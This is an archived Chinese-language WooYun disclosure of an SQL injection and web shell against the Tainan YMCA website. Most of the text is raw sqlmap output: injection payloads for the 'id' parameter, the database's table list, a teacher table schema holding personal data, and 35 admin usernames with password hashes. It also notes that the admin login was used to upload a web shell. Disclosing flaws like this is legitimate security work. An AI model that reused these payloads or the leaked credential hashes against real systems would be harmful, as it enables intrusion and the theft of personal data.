乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-19: 细节已通知厂商并且等待厂商处理中 2016-01-21: 厂商已经确认,细节仅向厂商公开 2016-01-31: 细节向核心白帽子及相关领域专家公开 2016-02-10: 细节向普通白帽子公开 2016-02-20: 细节向实习白帽子公开 2016-03-06: 细节向公众公开
台南市基督教青年会网站存在SQL注入getshell(大量用户数据泄漏)
台南市基督教青年会**.**.**.**注入点**.**.**.**/ymca/news_detail.php?id=152网站管理后台**.**.**.**/nursery/admin/login.php
注入点:**.**.**.**/ymca/news_detail.php?id=152
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=152 AND 2980=2980 Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: id=-5710 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176626771,0x72515149534a4e644842,0x716f757a71),NULL,NULL,NULL#---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15
当前用户数据库
current database: 'ymca_db'
大量表、字段
Database: ymca_db[77 tables]+-------------------------+| ad_banner || admin_account || at_heart_msg || carry_result_class || carry_result_event || carry_result_record || carry_result_record_pic || city_name || cjshs_event_photo || cjshs_event_photo_pic || cjshs_news || complain_faq || course_class || course_data || course_faq || course_learn_rpt || course_quest_answer || epaper_article_subject || epaper_main || epaper_section_content || epaper_send_log || epaper_subscriber || event_course || event_course_category || event_course_class || event_course_reg_mail || event_course_section || event_course_series || event_news || event_news_class || event_photo || event_photo_pic || event_reg || exam_accomp || exam_answer || exam_question || exam_sel_item || exam_subject || faq_class || faq_rpt || forum_class || forum_post || forum_topic || home_ad_links || institute_mail || links_rpt || marquee_news || msg_answer || msg_question || news_rpt || news_rpt_class || nurse_data || nurse_license || nurse_login_log || other_edu_score || park_event_photo || park_event_photo_pic || park_news || quest_answer || quest_class || quest_question || quest_question_class || quest_replier || quest_sel_item || quest_subject || site_content_article || site_content_section || site_content_upfile || site_map_item || teacher_data || teacher_login_log || vote_question || vote_sel_item || xie_event_photo || xie_event_photo_pic || xie_news || zip_code |+-------------------------+
Database: ymca_dbTable: teacher_data[30 columns]+-------------------------+---------------------+| Column | Type |+-------------------------+---------------------+| acc_status | char(1) || address | tinytext || birthday | date || dep | varchar(50) || e_mail | tinytext || end_date | date || health_insurance_areano | tinyint(3) unsigned || hospital_name | tinytext || hospital_no | varchar(20) || hp_type | tinyint(3) unsigned || id | int(10) unsigned || job | varchar(50) || keyin_date | datetime || keyin_man | varchar(20) || license_no | varchar(20) || login_date | datetime || mobile | varchar(50) || nickname | varchar(50) || p_id | char(10) || pass_word | varchar(13) || post_count | int(10) unsigned || realname | varchar(50) || remark | text || sex | enum('m','f') || start_date | date || tel_no | varchar(50) || upd_date | datetime || upd_man | varchar(20) || uppic_0 | varchar(50) || username | varchar(20) |+-------------------------+---------------------+
Database: ymca_dbTable: admin_account[35 entries]+------------+---------------+| username | pass_word |+------------+---------------+| admin_ymca | adkSkT8r/YRnI || ymcacj2 | ymq7RrK/pAyD2 || ymca03 | ymq7RrK/pAyD2 || ymcacj1 | ymq7RrK/pAyD2 || ymcas4a | ymq7RrK/pAyD2 || ymca00 | ymq7RrK/pAyD2 || ymca01 | ymVOU3yBz2nU. || ymca02 | ymAZq12ILCseM || ymcas4b | ymq7RrK/pAyD2 || ymcas4c | ymq7RrK/pAyD2 || ymcas4d | ymq7RrK/pAyD2 || ymcas4e | ymq7RrK/pAyD2 || ymcas1a | ymq7RrK/pAyD2 || ymcas1c | ymq7RrK/pAyD2 || ymcas1b | ymq7RrK/pAyD2 || ymcas1d | ymq7RrK/pAyD2 || ymcas1e | ymq7RrK/pAyD2 || ymcas1f | ymq7RrK/pAyD2 || ymcas1g | ymq7RrK/pAyD2 || ymcas1h | ymq7RrK/pAyD2 || ymcap4a | ymq7RrK/pAyD2 || ymcap4b | ymq7RrK/pAyD2 || ymcap4c | ymq7RrK/pAyD2 || ymcap4d | ymq7RrK/pAyD2 || ymcap1a | ymq7RrK/pAyD2 || ymcap1b | ymq7RrK/pAyD2 || ymcap1c | ymq7RrK/pAyD2 || ymcap1d | ymq7RrK/pAyD2 || ymcap1e | ymq7RrK/pAyD2 || ymcap1f | ymq7RrK/pAyD2 || ymcap1g | ymq7RrK/pAyD2 || ymcap1h | ymq7RrK/pAyD2 || ymcacj3 | ymq7RrK/pAyD2 || ymcas1i | ymq7RrK/pAyD2 || ymca_main | ymO5hfEm8F7Ro |+------------+---------------+
跑表得到后台管理员账号密码,登陆后台,上传getshell
过滤
危害等级:高
漏洞Rank:17
确认时间:2016-01-21 23:33
感謝通報
暂无